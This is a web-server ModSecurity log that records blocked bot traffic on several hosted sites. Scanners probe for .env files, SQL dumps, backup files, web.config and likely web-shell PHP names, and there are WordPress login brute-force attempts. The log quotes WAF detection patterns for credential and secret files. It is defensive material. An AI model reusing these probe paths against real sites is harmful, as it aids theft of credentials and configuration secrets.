[Tue May 26 19:57:05.817082 2026] [security2:error] [pid 93868:tid 94323] [client 85.208.96.196:35026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/month/"] [unique_id "ahWtuUqK9k_ZUB2Vp25hzgAAAdA"]
[Tue May 26 19:57:05.817223 2026] [security2:error] [pid 93868:tid 94323] [client 85.208.96.196:35026] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/month/"] [unique_id "ahWtuUqK9k_ZUB2Vp25hzgAAAdA"]
[Tue May 26 19:57:06.007267 2026] [security2:error] [pid 93868:tid 94318] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/next-app/client/.env"] [unique_id "ahWtukqK9k_ZUB2Vp25h1gAAAcs"]
[Tue May 26 19:57:06.041099 2026] [security2:error] [pid 93868:tid 94276] [client 20.9.81.163:36760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/a7.php"] [unique_id "ahWtukqK9k_ZUB2Vp25h2AAAAaE"]
[Tue May 26 19:57:06.041189 2026] [security2:error] [pid 93868:tid 94276] [client 20.9.81.163:36760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/a7.php"] [unique_id "ahWtukqK9k_ZUB2Vp25h2AAAAaE"]
[Tue May 26 19:57:06.410256 2026] [security2:error] [pid 93868:tid 94277] [client 20.9.81.163:36037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/classsmtps.php"] [unique_id "ahWtukqK9k_ZUB2Vp25h6QAAAaI"]
[Tue May 26 19:57:06.410387 2026] [security2:error] [pid 93868:tid 94277] [client 20.9.81.163:36037] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/classsmtps.php"] [unique_id "ahWtukqK9k_ZUB2Vp25h6QAAAaI"]
[Tue May 26 19:57:06.585892 2026] [security2:error] [pid 93868:tid 94259] [client 20.9.81.163:36384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/amax.php"] [unique_id "ahWtukqK9k_ZUB2Vp25h9QAAAZA"]
[Tue May 26 19:57:06.585995 2026] [security2:error] [pid 93868:tid 94259] [client 20.9.81.163:36384] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/amax.php"] [unique_id "ahWtukqK9k_ZUB2Vp25h9QAAAZA"]
[Tue May 26 19:57:06.765389 2026] [security2:error] [pid 93576:tid 93746] [client 20.9.81.163:35971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/CDX1.php"] [unique_id "ahWtumDRMqfxdEDkoszg1QAAACI"]
[Tue May 26 19:57:06.765496 2026] [security2:error] [pid 93576:tid 93746] [client 20.9.81.163:35971] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/CDX1.php"] [unique_id "ahWtumDRMqfxdEDkoszg1QAAACI"]
[Tue May 26 19:57:06.823895 2026] [security2:error] [pid 93868:tid 94258] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mysql_dump.sql"] [unique_id "ahWtukqK9k_ZUB2Vp25h-wAAAY8"]
[Tue May 26 19:57:06.882984 2026] [security2:error] [pid 93868:tid 94066] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWtukqK9k_ZUB2Vp25h_wACARY"]
[Tue May 26 19:57:06.945296 2026] [security2:error] [pid 93868:tid 94334] [client 202.76.128.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtukqK9k_ZUB2Vp25h7QAAAds"]
[Tue May 26 19:57:07.225310 2026] [security2:error] [pid 93868:tid 94299] [client 20.9.81.163:36464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahWtu0qK9k_ZUB2Vp25iEAAAAbg"]
[Tue May 26 19:57:07.225398 2026] [security2:error] [pid 93868:tid 94299] [client 20.9.81.163:36464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahWtu0qK9k_ZUB2Vp25iEAAAAbg"]
[Tue May 26 19:57:07.380849 2026] [security2:error] [pid 93576:tid 93759] [client 20.9.81.163:36357] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/1.php"] [unique_id "ahWtu2DRMqfxdEDkoszg3wAAAC8"]
[Tue May 26 19:57:07.380950 2026] [security2:error] [pid 93576:tid 93759] [client 20.9.81.163:36357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/1.php"] [unique_id "ahWtu2DRMqfxdEDkoszg3wAAAC8"]
[Tue May 26 19:57:07.381047 2026] [security2:error] [pid 93576:tid 93759] [client 20.9.81.163:36357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/1.php"] [unique_id "ahWtu2DRMqfxdEDkoszg3wAAAC8"]
[Tue May 26 19:57:07.537353 2026] [security2:error] [pid 93868:tid 94266] [client 20.9.81.163:37284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahWtu0qK9k_ZUB2Vp25iIwAAAZc"]
[Tue May 26 19:57:07.537489 2026] [security2:error] [pid 93868:tid 94266] [client 20.9.81.163:37284] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahWtu0qK9k_ZUB2Vp25iIwAAAZc"]
[Tue May 26 19:57:07.582511 2026] [security2:error] [pid 93868:tid 94375] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtu0qK9k_ZUB2Vp25iCwAAAgQ"]
[Tue May 26 19:57:07.773870 2026] [security2:error] [pid 93868:tid 94278] [client 20.9.81.163:36453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/css.php"] [unique_id "ahWtu0qK9k_ZUB2Vp25iLgAAAaM"]
[Tue May 26 19:57:07.773962 2026] [security2:error] [pid 93868:tid 94278] [client 20.9.81.163:36453] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/css.php"] [unique_id "ahWtu0qK9k_ZUB2Vp25iLgAAAaM"]
[Tue May 26 19:57:07.934820 2026] [security2:error] [pid 93868:tid 94259] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/system/.env.bak"] [unique_id "ahWtu0qK9k_ZUB2Vp25iNgAAAZA"]
[Tue May 26 19:57:08.148002 2026] [security2:error] [pid 93868:tid 94333] [client 20.9.81.163:36000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/php.php"] [unique_id "ahWtvEqK9k_ZUB2Vp25iQAAAAdo"]
[Tue May 26 19:57:08.148112 2026] [security2:error] [pid 93868:tid 94333] [client 20.9.81.163:36000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/php.php"] [unique_id "ahWtvEqK9k_ZUB2Vp25iQAAAAdo"]
[Tue May 26 19:57:08.555970 2026] [security2:error] [pid 93868:tid 94382] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/php/users.bak"] [unique_id "ahWtvEqK9k_ZUB2Vp25iVwAAAgs"]
[Tue May 26 19:57:08.866320 2026] [security2:error] [pid 93868:tid 94276] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/laravel/config/.env"] [unique_id "ahWtvEqK9k_ZUB2Vp25iZAAAAaE"]
[Tue May 26 19:57:09.177550 2026] [security2:error] [pid 93868:tid 94354] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/test/users.bak"] [unique_id "ahWtvUqK9k_ZUB2Vp25ibwAAAe8"]
[Tue May 26 19:57:09.332966 2026] [security2:error] [pid 93868:tid 94371] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.php.swp"] [unique_id "ahWtvUqK9k_ZUB2Vp25icgAAAgA"]
[Tue May 26 19:57:09.488483 2026] [security2:error] [pid 93868:tid 94294] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/class.php.orig"] [unique_id "ahWtvUqK9k_ZUB2Vp25iewAAAbM"]
[Tue May 26 19:57:09.898291 2026] [security2:error] [pid 93576:tid 93621] [remote 74.91.224.220:55066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWtvWDRMqfxdEDkoszg9gAAAio"]
[Tue May 26 19:57:10.315453 2026] [security2:error] [pid 93576:tid 93787] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtvWDRMqfxdEDkoszg9wAAAEs"]
[Tue May 26 19:57:10.584781 2026] [security2:error] [pid 93868:tid 94274] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db.copy"] [unique_id "ahWtvkqK9k_ZUB2Vp25isgAAAZ8"]
[Tue May 26 19:57:10.691083 2026] [security2:error] [pid 93576:tid 93813] [client 209.141.33.219:61512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.33.141.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWtvmDRMqfxdEDkoszg_gAAAGU"]
[Tue May 26 19:57:10.895220 2026] [security2:error] [pid 93868:tid 94371] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/login/web.config"] [unique_id "ahWtvkqK9k_ZUB2Vp25iuwAAAgA"]
[Tue May 26 19:57:11.050849 2026] [security2:error] [pid 93868:tid 94284] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/users/.env.bak"] [unique_id "ahWtv0qK9k_ZUB2Vp25iwwAAAak"]
[Tue May 26 19:57:11.938781 2026] [security2:error] [pid 93576:tid 93641] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/.env"] [unique_id "ahWtv2DRMqfxdEDkoszhDQAAYz0"]
[Tue May 26 19:57:11.985247 2026] [security2:error] [pid 93868:tid 94370] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/client/mutual-fund-app/.env"] [unique_id "ahWtv0qK9k_ZUB2Vp25i5wAAAf8"]
[Tue May 26 19:57:12.302260 2026] [security2:error] [pid 93868:tid 94109] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/.env.backup"] [unique_id "ahWtwEqK9k_ZUB2Vp25i8gABxS0"]
[Tue May 26 19:57:12.524203 2026] [security2:error] [pid 93576:tid 93638] [remote 111.229.141.137:41930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWtwGDRMqfxdEDkoszhHQAAfjo"]
[Tue May 26 19:57:12.610260 2026] [security2:error] [pid 93868:tid 94283] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/blockchain/.env"] [unique_id "ahWtwEqK9k_ZUB2Vp25i9wAAAag"]
[Tue May 26 19:57:12.732186 2026] [security2:error] [pid 93868:tid 94084] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/.env.old"] [unique_id "ahWtwEqK9k_ZUB2Vp25i-QAB9SA"]
[Tue May 26 19:57:13.022493 2026] [security2:error] [pid 93576:tid 93610] [remote 74.91.224.220:55066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWtwGDRMqfxdEDkoszhOgAAHR8"], referer: https://nicmaperu.com/wp-login.php
[Tue May 26 19:57:13.086545 2026] [security2:error] [pid 93868:tid 94107] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/.env.bak"] [unique_id "ahWtwUqK9k_ZUB2Vp25jAQABqiw"]
[Tue May 26 19:57:13.191071 2026] [security2:error] [pid 93576:tid 93763] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtwGDRMqfxdEDkoszhLwAAADM"]
[Tue May 26 19:57:13.390852 2026] [security2:error] [pid 93868:tid 94314] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/static/sample.bak"] [unique_id "ahWtwUqK9k_ZUB2Vp25jBwAAAcc"]
[Tue May 26 19:57:13.702385 2026] [security2:error] [pid 93868:tid 94371] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/config.sql"] [unique_id "ahWtwUqK9k_ZUB2Vp25jFgAAAgA"]
[Tue May 26 19:57:13.856907 2026] [security2:error] [pid 93868:tid 94380] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/contentful/.env"] [unique_id "ahWtwUqK9k_ZUB2Vp25jGgAAAgk"]
[Tue May 26 19:57:13.994537 2026] [security2:error] [pid 93868:tid 94144] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/config/.env"] [unique_id "ahWtwUqK9k_ZUB2Vp25jHQAB3kA"]
[Tue May 26 19:57:14.168364 2026] [security2:error] [pid 93868:tid 94286] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/etc/local.xml.bak"] [unique_id "ahWtwkqK9k_ZUB2Vp25jIwAAAas"]
